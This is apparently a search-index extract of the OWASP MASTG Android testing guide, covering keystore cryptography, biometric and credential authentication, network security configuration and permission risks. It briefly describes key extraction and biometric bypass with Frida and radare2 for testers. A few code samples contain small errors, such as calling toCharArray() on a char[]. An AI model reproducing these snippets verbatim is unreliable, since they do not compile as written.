For some applications that support older versions of Android (e.g.: only used versions lower than Android 7.0 (API level 24)), bundling an up-to-date library may be the only option. Conscrypt library is a good choice in this situation to keep the cryptography consistent across the different API levels and avoid having to import Bouncy Castle which is a heavier library.
Conscrypt for Android can be imported this way:
dependencies {\n implementation 'org.conscrypt:conscrypt-android:last_version'\n}\n
Next, the provider must be registered by calling:
Security.addProvider(Conscrypt.newProvider())\n
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#key-generation","title":"Key Generation","text":"The Android SDK allows you to specify how a key should be generated, and under which circumstances it can be used. Android 6.0 (API level 23) introduced the KeyGenParameterSpec
class that can be used to ensure the correct key usage in the application. For example:
String keyAlias = \"MySecretKey\";\n\nKeyGenParameterSpec keyGenParameterSpec = new KeyGenParameterSpec.Builder(keyAlias,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setRandomizedEncryptionRequired(true)\n .build();\n\nKeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES,\n \"AndroidKeyStore\");\nkeyGenerator.init(keyGenParameterSpec);\n\nSecretKey secretKey = keyGenerator.generateKey();\n
The KeyGenParameterSpec
indicates that the key can be used for encryption and decryption, but not for other purposes, such as signing or verifying. It further specifies the block mode (CBC), padding (PKCS #7), and explicitly specifies that randomized encryption is required (this is the default). Next, we enter AndroidKeyStore
as the name of the provider in the KeyGenerator.getInstance
call to ensure that the keys are stored in the Android KeyStore.
GCM is another AES block mode that provides additional security benefits over other, older modes. In addition to being cryptographically more secure, it also provides authentication. When using CBC (and other modes), authentication would need to be performed separately, using HMACs (see the \"Tampering and Reverse Engineering on Android\" chapter). Note that GCM is the only mode of AES that does not support padding.
Attempting to use the generated key in violation of the above spec would result in a security exception.
Here's an example of using that key to encrypt:
String AES_MODE = KeyProperties.KEY_ALGORITHM_AES\n + \"/\" + KeyProperties.BLOCK_MODE_CBC\n + \"/\" + KeyProperties.ENCRYPTION_PADDING_PKCS7;\nKeyStore AndroidKeyStore = AndroidKeyStore.getInstance(\"AndroidKeyStore\");\n\n// byte[] input\nKey key = AndroidKeyStore.getKey(keyAlias, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\ncipher.init(Cipher.ENCRYPT_MODE, key);\n\nbyte[] encryptedBytes = cipher.doFinal(input);\nbyte[] iv = cipher.getIV();\n// save both the IV and the encryptedBytes\n
Both the IV (initialization vector) and the encrypted bytes need to be stored; otherwise decryption is not possible.
Here's how that cipher text would be decrypted. The input
is the encrypted byte array and iv
is the initialization vector from the encryption step:
// byte[] input\n// byte[] iv\nKey key = AndroidKeyStore.getKey(AES_KEY_ALIAS, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\nIvParameterSpec params = new IvParameterSpec(iv);\ncipher.init(Cipher.DECRYPT_MODE, key, params);\n\nbyte[] result = cipher.doFinal(input);\n
Since the IV is randomly generated each time, it should be saved along with the cipher text (encryptedBytes
) in order to decrypt it later.
Prior to Android 6.0 (API level 23), AES key generation was not supported. As a result, many implementations chose to use RSA and generated a public-private key pair for asymmetric encryption using KeyPairGeneratorSpec
or used SecureRandom
to generate AES keys.
Here's an example of KeyPairGenerator
and KeyPairGeneratorSpec
used to create the RSA key pair:
Date startDate = Calendar.getInstance().getTime();\nCalendar endCalendar = Calendar.getInstance();\nendCalendar.add(Calendar.YEAR, 1);\nDate endDate = endCalendar.getTime();\nKeyPairGeneratorSpec keyPairGeneratorSpec = new KeyPairGeneratorSpec.Builder(context)\n .setAlias(RSA_KEY_ALIAS)\n .setKeySize(4096)\n .setSubject(new X500Principal(\"CN=\" + RSA_KEY_ALIAS))\n .setSerialNumber(BigInteger.ONE)\n .setStartDate(startDate)\n .setEndDate(endDate)\n .build();\n\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"RSA\",\n \"AndroidKeyStore\");\nkeyPairGenerator.initialize(keyPairGeneratorSpec);\n\nKeyPair keyPair = keyPairGenerator.generateKeyPair();\n
This sample creates the RSA key pair with a key size of 4096-bit (i.e. modulus size). Elliptic Curve (EC) keys can also be generated in a similar way. However as of Android 11 (API level 30), AndroidKeyStore does not support encryption or decryption with EC keys. They can only be used for signatures.
A symmetric encryption key can be generated from the passphrase by using the Password Based Key Derivation Function version 2 (PBKDF2). This cryptographic protocol is designed to generate cryptographic keys, which can be used for cryptography purpose. Input parameters for the algorithm are adjusted according to weak key generation function section. The code listing below illustrates how to generate a strong encryption key based on a password.
public static SecretKey generateStrongAESKey(char[] password, int keyLength)\n{\n //Initialize objects and variables for later use\n int iterationCount = 10000;\n int saltLength = keyLength / 8;\n SecureRandom random = new SecureRandom();\n //Generate the salt\n byte[] salt = new byte[saltLength];\n random.nextBytes(salt);\n KeySpec keySpec = new PBEKeySpec(password.toCharArray(), salt, iterationCount, keyLength);\n SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA1\");\n byte[] keyBytes = keyFactory.generateSecret(keySpec).getEncoded();\n return new SecretKeySpec(keyBytes, \"AES\");\n}\n
The above method requires a character array containing the password and the needed key length in bits, for instance a 128 or 256-bit AES key. We define an iteration count of 10,000 rounds which will be used by the PBKDF2 algorithm. Increasing the number of iterations significantly increases the workload for a brute-force attack on the password, however it can affect performance as more computational power is required for key derivation. We define the salt size equal to the key length divided by 8 in order to convert from bits to bytes and we use the SecureRandom
class to randomly generate a salt. The salt needs to be kept constant to ensure the same encryption key is generated time after time for the same supplied password. Note that you can store the salt privately in SharedPreferences
. It is recommended to exclude the salt from the Android backup mechanism to prevent synchronization in case of higher risk data.
Note that if you take a rooted device or a patched (e.g. repackaged) application into account as a threat to the data, it might be better to encrypt the salt with a key that is placed in the AndroidKeystore
. The Password-Based Encryption (PBE) key is generated using the recommended PBKDF2WithHmacSHA1
algorithm, until Android 8.0 (API level 26). For higher API levels, it is best to use PBKDF2withHmacSHA256
, which will end up with a longer hash value.
Note: there is a widespread false believe that the NDK should be used to hide cryptographic operations and hardcoded keys. However, using this mechanism is not effective. Attackers can still use tools to find the mechanism used and make dumps of the key in memory. Next, the control flow can be analyzed with e.g. radare2 and the keys extracted with the help of Frida or the combination of both: r2frida (see sections \"Disassembling Native Code\", \"Memory Dump\" and \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\" for more details). From Android 7.0 (API level 24) onward, it is not allowed to use private APIs, instead: public APIs need to be called, which further impacts the effectiveness of hiding it away as described in the Android Developers Blog
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#random-number-generation","title":"Random number generation","text":"Cryptography requires secure pseudo random number generation (PRNG). Standard Java classes as java.util.Random
do not provide sufficient randomness and in fact may make it possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.
In general, SecureRandom
should be used. However, if the Android versions below Android 4.4 (API level 19) are supported, additional care needs to be taken in order to work around the bug in Android 4.1-4.3 (API level 16-18) versions that failed to properly initialize the PRNG.
Most developers should instantiate SecureRandom
via the default constructor without any arguments. Other constructors are for more advanced uses and, if used incorrectly, can lead to decreased randomness and security. The PRNG provider backing SecureRandom
uses the SHA1PRNG
from AndroidOpenSSL
(Conscrypt) provider.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
On Android, there are two mechanisms supported by the Android Runtime for local authentication: the Confirm Credential flow and the Biometric Authentication flow.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#confirm-credential-flow","title":"Confirm Credential Flow","text":"The confirm credential flow is available since Android 6.0 and is used to ensure that users do not have to enter app-specific passwords together with the lock screen protection. Instead: if a user has logged in to the device recently, then confirm-credentials can be used to unlock cryptographic materials from the AndroidKeystore
. That is, if the user unlocked the device within the set time limits (setUserAuthenticationValidityDurationSeconds
), otherwise the device needs to be unlocked again.
Note that the security of Confirm Credentials is only as strong as the protection set at the lock screen. This often means that simple predictive lock-screen patterns are used and therefore we do not recommend any apps which require L2 of security controls to use Confirm Credentials.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-authentication-flow","title":"Biometric Authentication Flow","text":"Biometric authentication is a convenient mechanism for authentication, but also introduces an additional attack surface when using it. The Android developer documentation gives an interesting overview and indicators for measuring biometric unlock security.
The Android platform offers three different classes for biometric authentication:
BiometricManager
BiometricPrompt
FingerprintManager
(deprecated in Android 9 (API level 28))The class BiometricManager
can be used to verify if biometric hardware is available on the device and if it's configured by the user. If that's the case, the class BiometricPrompt
can be used to show a system-provided biometric dialog.
The BiometricPrompt
class is a significant improvement, as it allows to have a consistent UI for biometric authentication on Android and also supports more sensors than just fingerprint.
This is different to the FingerprintManager
class which only supports fingerprint sensors and provides no UI, forcing developers to build their own fingerprint UI.
A very detailed overview and explanation of the Biometric API on Android was published on the Android Developer Blog.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager-deprecated-in-android-9-api-level-28","title":"FingerprintManager (deprecated in Android 9 (API level 28))","text":"Android 6.0 (API level 23) introduced public APIs for authenticating users via fingerprint, but is deprecated in Android 9 (API level 28). Access to the fingerprint hardware is provided through the FingerprintManager
class. An app can request fingerprint authentication by instantiating a FingerprintManager
object and calling its authenticate
method. The caller registers callback methods to handle possible outcomes of the authentication process (i.e. success, failure, or error). Note that this method doesn't constitute strong proof that fingerprint authentication has actually been performed - for example, the authentication step could be patched out by an attacker, or the \"success\" callback could be overloaded using dynamic instrumentation.
You can achieve better security by using the fingerprint API in conjunction with the Android KeyGenerator
class. With this approach, a symmetric key is stored in the Android KeyStore and unlocked with the user's fingerprint. For example, to enable user access to a remote service, an AES key is created which encrypts the authentication token. By calling setUserAuthenticationRequired(true)
when creating the key, it is ensured that the user must re-authenticate to retrieve it. The encrypted authentication token can then be saved directly on the device (e.g. via Shared Preferences). This design is a relatively safe way to ensure the user actually entered an authorized fingerprint.
An even more secure option is using asymmetric cryptography. Here, the mobile app creates an asymmetric key pair in the KeyStore and enrolls the public key on the server backend. Later transactions are then signed with the private key and verified by the server using the public key.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-library","title":"Biometric Library","text":"Android provides a library called Biometric which offers a compatibility version of the BiometricPrompt
and BiometricManager
APIs, as implemented in Android 10, with full feature support back to Android 6.0 (API 23).
You can find a reference implementation and instructions on how to show a biometric authentication dialog in the Android developer documentation.
There are two authenticate
methods available in the BiometricPrompt
class. One of them expects a CryptoObject
, which adds an additional layer of security for the biometric authentication.
The authentication flow would be as follows when using CryptoObject:
setUserAuthenticationRequired
and setInvalidatedByBiometricEnrollment
set to true. Additionally, setUserAuthenticationValidityDurationSeconds
should be set to -1.authenticate
method and the CryptoObject
.If CryptoObject
is not used as part of the authenticate method, it can be bypassed by using Frida. See the \"Dynamic Instrumentation\" section for more details.
Developers can use several validation classes offered by Android to test the implementation of biometric authentication in their app.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager","title":"FingerprintManager","text":"This section describes how to implement biometric authentication by using the FingerprintManager
class. Please keep in mind that this class is deprecated and the Biometric library should be used instead as a best practice. This section is just for reference, in case you come across such an implementation and need to analyze it.
Begin by searching for FingerprintManager.authenticate
calls. The first parameter passed to this method should be a CryptoObject
instance which is a wrapper class for crypto objects supported by FingerprintManager. Should the parameter be set to null
, this means the fingerprint authorization is purely event-bound, likely creating a security issue.
The creation of the key used to initialize the cipher wrapper can be traced back to the CryptoObject
. Verify the key was both created using the KeyGenerator
class in addition to setUserAuthenticationRequired(true)
being called during creation of the KeyGenParameterSpec
object (see code samples below).
Make sure to verify the authentication logic. For the authentication to be successful, the remote endpoint must require the client to present the secret retrieved from the KeyStore, a value derived from the secret, or a value signed with the client private key (see above).
Safely implementing fingerprint authentication requires following a few simple principles, starting by first checking if that type of authentication is even available. On the most basic front, the device must run Android 6.0 or higher (API 23+). Four other prerequisites must also be verified:
The permission must be requested in the Android Manifest:
<uses-permission\n android:name=\"android.permission.USE_FINGERPRINT\" />\n
Fingerprint hardware must be available:
FingerprintManager fingerprintManager = (FingerprintManager)\n context.getSystemService(Context.FINGERPRINT_SERVICE);\nfingerprintManager.isHardwareDetected();\n
The user must have a protected lock screen:
KeyguardManager keyguardManager = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);\nkeyguardManager.isKeyguardSecure(); //note if this is not the case: ask the user to setup a protected lock screen\n
At least one finger should be registered:
fingerprintManager.hasEnrolledFingerprints();\n
The application should have permission to ask for a user fingerprint:
context.checkSelfPermission(Manifest.permission.USE_FINGERPRINT) == PermissionResult.PERMISSION_GRANTED;\n
If any of the above checks fail, the option for fingerprint authentication should not be offered.
It is important to remember that not every Android device offers hardware-backed key storage. The KeyInfo
class can be used to find out whether the key resides inside secure hardware such as a Trusted Execution Environment (TEE) or Secure Element (SE).
SecretKeyFactory factory = SecretKeyFactory.getInstance(getEncryptionKey().getAlgorithm(), ANDROID_KEYSTORE);\nKeyInfo secetkeyInfo = (KeyInfo) factory.getKeySpec(yourencryptionkeyhere, KeyInfo.class);\nsecetkeyInfo.isInsideSecureHardware()\n
On certain systems, it is possible to enforce the policy for biometric authentication through hardware as well. This is checked by:
keyInfo.isUserAuthenticationRequirementEnforcedBySecureHardware();\n
The following describes how to do fingerprint authentication using a symmetric key pair.
Fingerprint authentication may be implemented by creating a new AES key using the KeyGenerator
class by adding setUserAuthenticationRequired(true)
in KeyGenParameterSpec.Builder
.
generator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, KEYSTORE);\n\ngenerator.init(new KeyGenParameterSpec.Builder (KEY_ALIAS,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setUserAuthenticationRequired(true)\n .build()\n);\n\ngenerator.generateKey();\n
To perform encryption or decryption with the protected key, create a Cipher
object and initialize it with the key alias.
SecretKey keyspec = (SecretKey)keyStore.getKey(KEY_ALIAS, null);\n\nif (mode == Cipher.ENCRYPT_MODE) {\n cipher.init(mode, keyspec);\n
Keep in mind, a new key cannot be used immediately - it has to be authenticated through the FingerprintManager
first. This involves wrapping the Cipher
object into FingerprintManager.CryptoObject
which is passed to FingerprintManager.authenticate
before it will be recognized.
cryptoObject = new FingerprintManager.CryptoObject(cipher);\nfingerprintManager.authenticate(cryptoObject, new CancellationSignal(), 0, this, null);\n
The callback method onAuthenticationSucceeded(FingerprintManager.AuthenticationResult result)
is called when the authentication succeeds. The authenticated CryptoObject
can then be retrieved from the result.
public void authenticationSucceeded(FingerprintManager.AuthenticationResult result) {\n cipher = result.getCryptoObject().getCipher();\n\n //(... do something with the authenticated cipher object ...)\n}\n
The following describes how to do fingerprint authentication using an asymmetric key pair.
To implement fingerprint authentication using asymmetric cryptography, first create a signing key using the KeyPairGenerator
class, and enroll the public key with the server. You can then authenticate pieces of data by signing them on the client and verifying the signature on the server. A detailed example for authenticating to remote servers using the fingerprint API can be found in the Android Developers Blog.
A key pair is generated as follows:
KeyPairGenerator.getInstance(KeyProperties.KEY_ALGORITHM_EC, \"AndroidKeyStore\");\nkeyPairGenerator.initialize(\n new KeyGenParameterSpec.Builder(MY_KEY,\n KeyProperties.PURPOSE_SIGN)\n .setDigests(KeyProperties.DIGEST_SHA256)\n .setAlgorithmParameterSpec(new ECGenParameterSpec(\"secp256r1\"))\n .setUserAuthenticationRequired(true)\n .build());\nkeyPairGenerator.generateKeyPair();\n
To use the key for signing, you need to instantiate a CryptoObject and authenticate it through FingerprintManager
.
Signature.getInstance(\"SHA256withECDSA\");\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nPrivateKey key = (PrivateKey) keyStore.getKey(MY_KEY, null);\nsignature.initSign(key);\nCryptoObject cryptoObject = new FingerprintManager.CryptoObject(signature);\n\nCancellationSignal cancellationSignal = new CancellationSignal();\nFingerprintManager fingerprintManager =\n context.getSystemService(FingerprintManager.class);\nfingerprintManager.authenticate(cryptoObject, cancellationSignal, 0, this, null);\n
You can now sign the contents of a byte array inputBytes
as follows.
Signature signature = cryptoObject.getSignature();\nsignature.update(inputBytes);\nbyte[] signed = signature.sign();\n
Android 7.0 (API level 24) adds the setInvalidatedByBiometricEnrollment(boolean invalidateKey)
method to KeyGenParameterSpec.Builder
. When invalidateKey
value is set to true
(the default), keys that are valid for fingerprint authentication are irreversibly invalidated when a new fingerprint is enrolled. This prevents an attacker from retrieving they key even if they are able to enroll an additional fingerprint.
Android 8.0 (API level 26) adds two additional error codes:
FINGERPRINT_ERROR_LOCKOUT_PERMANENT
: The user has tried too many times to unlock their device using the fingerprint reader.FINGERPRINT_ERROR_VENDOR
: A vendor-specific fingerprint reader error occurred.Reassure that the lock screen is set:
KeyguardManager mKeyguardManager = (KeyguardManager) getSystemService(Context.KEYGUARD_SERVICE);\nif (!mKeyguardManager.isKeyguardSecure()) {\n // Show a message that the user hasn't set up a lock screen.\n}\n
Create the key protected by the lock screen. In order to use this key, the user needs to have unlocked the device in the last X seconds, or the device needs to be unlocked again. Make sure that this timeout is not too long, as it becomes harder to ensure that it was the same user using the app as the user unlocking the device:
try {\n KeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\n keyStore.load(null);\n KeyGenerator keyGenerator = KeyGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_AES, \"AndroidKeyStore\");\n\n // Set the alias of the entry in Android KeyStore where the key will appear\n // and the constrains (purposes) in the constructor of the Builder\n keyGenerator.init(new KeyGenParameterSpec.Builder(KEY_NAME,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setUserAuthenticationRequired(true)\n // Require that the user has unlocked in the last 30 seconds\n .setUserAuthenticationValidityDurationSeconds(30)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .build());\n keyGenerator.generateKey();\n} catch (NoSuchAlgorithmException | NoSuchProviderException\n | InvalidAlgorithmParameterException | KeyStoreException\n | CertificateException | IOException e) {\n throw new RuntimeException(\"Failed to create a symmetric key\", e);\n}\n
Set up the lock screen to confirm:
private static final int REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS = 1; //used as a number to verify whether this is where the activity results from\nIntent intent = mKeyguardManager.createConfirmDeviceCredentialIntent(null, null);\nif (intent != null) {\n startActivityForResult(intent, REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS);\n}\n
Use the key after lock screen:
@Override\nprotected void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (requestCode == REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS) {\n // Challenge completed, proceed with using cipher\n if (resultCode == RESULT_OK) {\n //use the key for the actual authentication flow\n } else {\n // The user canceled or didn\u2019t complete the lock screen\n // operation. Go to error/cancellation flow.\n }\n }\n}\n
Make sure that fingerprint authentication and/or other types of biometric authentication are exclusively based on the Android SDK and its APIs. If this is not the case, ensure that the alternative SDK has been properly vetted for any weaknesses. Make sure that the SDK is backed by the TEE/SE which unlocks a (cryptographic) secret based on the biometric authentication. This secret should not be unlocked by anything else, but a valid biometric entry. That way, it should never be the case that the fingerprint logic can be bypassed.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/","title":"Android Network Communication","text":""},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#overview","title":"Overview","text":"Almost every Android app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network based-attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#android-network-security-configuration","title":"Android Network Security Configuration","text":"Starting on Android 7.0 (API level 24), Android apps can customize their network security settings using the so-called Network Security Configuration feature which offers the following key capabilities:
If an app defines a custom Network Security Configuration, you can obtain its location by searching for android:networkSecurityConfig
in the AndroidManifest.xml file.
<application android:networkSecurityConfig=\"@xml/network_security_config\"\n
In this case the file is located at @xml
(equivalent to /res/xml) and has the name \"network_security_config\" (which might vary). You should be able to find it as \"res/xml/network_security_config.xml\". If a configuration exists, the following event should be visible in the system logs:
D/NetworkSecurityConfig: Using Network Security Config from resource network_security_config\n
The Network Security Configuration is XML-based and can be used to configure app-wide and domain-specific settings:
base-config
applies to all connections that the app attempts to make.domain-config
overrides base-config
for specific domains (it can contain multiple domain
entries).For example, the following configuration uses the base-config
to prevent cleartext traffic for all domains. But it overrides that rule using a domain-config
, explicitly allowing cleartext traffic for localhost
.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <base-config cleartextTrafficPermitted=\"false\" />\n <domain-config cleartextTrafficPermitted=\"true\">\n <domain>localhost</domain>\n </domain-config>\n</network-security-config>\n
Learn more:
The default configuration for apps targeting Android 9 (API level 28) and higher is as follows:
<base-config cleartextTrafficPermitted=\"false\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 7.0 (API level 24) to Android 8.1 (API level 27) is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 6.0 (API level 23) and lower is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n</base-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#certificate-pinning","title":"Certificate Pinning","text":"The Network Security Configuration can also be used to pin declarative certificates to specific domains. This is done by providing a <pin-set>
in the Network Security Configuration, which is a set of digests (hashes) of the public key (SubjectPublicKeyInfo
) of the corresponding X.509 certificate.
When attempting to establish a connection to a remote endpoint, the system will:
If at least one of the pinned digests matches, the certificate chain will be considered valid and the connection will proceed.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n Use certificate pinning for OWASP website access including sub domains\n <domain includeSubdomains=\"true\">owasp.org</domain>\n <pin-set expiration=\"2018/8/10\">\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Intermediate CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">YLh1dUR9y6Kja30RrAn7JKnbQG/uEtLMkBgFF2Fuihg=</pin>\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Root CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">Vjs8r4z+80wjNcr1YKepWQboSIRi63WsWXhIMN+eWys=</pin>\n </pin-set>\n </domain-config>\n</network-security-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#security-provider","title":"Security Provider","text":"Android relies on a security provider to provide SSL/TLS-based connections. The problem with this kind of security provider (one example is OpenSSL), which comes with the device, is that it often has bugs and/or vulnerabilities.
To avoid known vulnerabilities, developers need to make sure that the application will install a proper security provider. Since July 11, 2016, Google has been rejecting Play Store application submissions (both new applications and updates) that use vulnerable versions of OpenSSL.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/","title":"Android Platform APIs","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#app-permissions","title":"App Permissions","text":"Android assigns a distinct system identity (Linux user ID and group ID) to every installed app. Because each Android app operates in a process sandbox, apps must explicitly request access to resources and data that are outside their sandbox. They request this access by declaring the permissions they need to use system data and features. Depending on how sensitive or critical the data or feature is, the Android system will grant the permission automatically or ask the user to approve the request.
To enhance user privacy and mitigate privacy risks, it is crucial for Android apps to minimize permission requests and only request access to sensitive information when absolutely necessary. The Android developer documentation offers valuable insights and best practices to help apps achieve the same level of functionality without requiring direct access to sensitive resources:
Android permissions can be classified into distinct categories depending on the extent of restricted data access and permitted actions that they grant to an app. This classification includes the so-called \"Protection Level\" as shown on the permissions API reference page and AndroidManifest.xml Source Definitions.
normal
. Grants apps access to isolated application-level features with minimal risk to other apps, the user, and the system. Example: android.permission.INTERNET
signature
. Granted only to apps signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_MOCK_LOCATION
systemOrSignature
. Reserved for system-embedded apps or those signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_DOWNLOAD_MANAGER
. Old synonym for signature|privileged
. Deprecated in API level 23.dangerous
. Grant additional access to restricted data or let the app perform restricted actions that more substantially affect the system and other apps.appop
. Grant access to system resources that are particularly sensitive such as displaying and drawing over other apps or accessing all storage data.normal
, signature
or dangerous
.Independently from the assigned Protection Level, it is important to consider the risk that a permission might be posing considering the additional guarded capabilities, this is especially important for preloaded apps. The following table presents a representative set of Android permissions categorized by associated risk as defined in this paper which leverages the set of (privileged) permissions and entrance points to an app to estimate its attack surface.
Risk Category Permissions Protection Level ASTRONOMICALandroid.permission.INSTALL_PACKAGES
signature CRITICAL android.permission.COPY_PROTECTED_DATA
signature android.permission.WRITE_SECURE_SETTINGS
signature android.permission.READ_FRAME_BUFFER
signature android.permission.MANAGE_CA_CERTIFICATES
signature android.permission.MANAGE_APP_OPS_MODES
signature android.permission.GRANT_RUNTIME_PERMISSIONS
signature android.permission.DUMP
signature android.permission.CAMERA
dangerous android.permission.SYSTEM_CAMERA
systemOrSignature android.permission.MANAGE_PROFILE_AND_DEVICE_OWNERS
signature android.permission.MOUNT_UNMOUNT_FILESYSTEMS
signature HIGH android.permission.INSTALL_GRANT_RUNTIME_PERMISSIONS
signature android.permission.READ_SMS
dangerous android.permission.WRITE_SMS
normal android.permission.RECEIVE_MMS
dangerous android.permission.SEND_SMS_NO_CONFIRMATION
signature android.permission.RECEIVE_SMS
dangerous android.permission.READ_LOGS
signature android.permission.READ_PRIVILEGED_PHONE_STATE
signature android.permission.LOCATION_HARDWARE
signature android.permission.ACCESS_FINE_LOCATION
dangerous android.permission.ACCESS_BACKGROUND_LOCATION
dangerous android.permission.BIND_ACCESSIBILITY_SERVICE
signature android.permission.ACCESS_WIFI_STATE
normal com.android.voicemail.permission.READ_VOICEMAIL
signature android.permission.RECORD_AUDIO
dangerous android.permission.CAPTURE_AUDIO_OUTPUT
signature android.permission.ACCESS_NOTIFICATIONS
signature android.permission.INTERACT_ACROSS_USERS_FULL
signature android.permission.BLUETOOTH_PRIVILEGED
signature android.permission.GET_PASSWORD
signature android.permission.INTERNAL_SYSTEM_WINDOW
signature MEDIUM android.permission.ACCESS_COARSE_LOCATION
dangerous android.permission.CHANGE_COMPONENT_ENABLED_STATE
signature android.permission.READ_CONTACTS
dangerous android.permission.WRITE_CONTACTS
dangerous android.permission.CONNECTIVITY_INTERNAL
signature android.permission.ACCESS_MEDIA_LOCATION
dangerous android.permission.READ_EXTERNAL_STORAGE
dangerous android.permission.WRITE_EXTERNAL_STORAGE
dangerous android.permission.SYSTEM_ALERT_WINDOW
signature android.permission.READ_CALL_LOG
dangerous android.permission.WRITE_CALL_LOG
dangerous android.permission.INTERACT_ACROSS_USERS
signature android.permission.MANAGE_USERS
signature android.permission.READ_CALENDAR
dangerous android.permission.BLUETOOTH_ADMIN
normal android.permission.BODY_SENSORS
dangerous LOW android.permission.DOWNLOAD_WITHOUT_NOTIFICATION
normal android.permission.PACKAGE_USAGE_STATS
signature android.permission.MASTER_CLEAR
signature android.permission.DELETE_PACKAGES
normal android.permission.GET_PACKAGE_SIZE
normal android.permission.BLUETOOTH
normal android.permission.DEVICE_POWER
signature NONE android.permission.ACCESS_NETWORK_STATE
normal android.permission.RECEIVE_BOOT_COMPLETED
normal android.permission.WAKE_LOCK
normal android.permission.FLASHLIGHT
normal android.permission.VIBRATE
normal android.permission.WRITE_MEDIA_STORAGE
signature android.permission.MODIFY_AUDIO_SETTINGS
normal Note that this categorization can change over time. The paper gives us an example of that:
Prior to Android 10, the READ_PHONE_STATE
permission would be classified as HIGH, due to the permanent device identifiers (e.g. (IMEI/MEID, IMSI, SIM, and build serial) that it guards. However, starting from Android 10, a bulk of the sensitive information that can be used for tracking has been moved, refactored or rescoped into a new permission called READ_PRIVILEGED_PHONE_STATE
, putting the new permission in the HIGH category, but resulting in the READ_PHONE_STATE
permission moving to LOW.
Android 8.0 (API level 26) Changes:
The following changes affect all apps running on Android 8.0 (API level 26), even to those apps targeting lower API levels.
READ_CONTACTS
permission, queries for contact's usage data will return approximations rather than exact values (the auto-complete API is not affected by this change).Apps targeting Android 8.0 (API level 26) or higher are affected by the following:
GET_ACCOUNTS
permission granted, unless the authenticator owns the accounts or the user grants that access.PHONE
permissions group:ANSWER_PHONE_CALLS
permission allows to answer incoming phone calls programmatically (via acceptRingingCall
).READ_PHONE_NUMBERS
permission grants read access to the phone numbers stored in the device.Restrictions when granting dangerous permissions: Dangerous permissions are classified into permission groups (e.g. the STORAGE
group contains READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
). Before Android 8.0 (API level 26), it was sufficient to request one permission of the group in order to get all permissions of that group also granted at the same time. This has changed starting at Android 8.0 (API level 26): whenever an app requests a permission at runtime, the system will grant exclusively that specific permission. However, note that all subsequent requests for permissions in that permission group will be automatically granted without showing the permissions dialog to the user. See this example from the Android developer documentation:
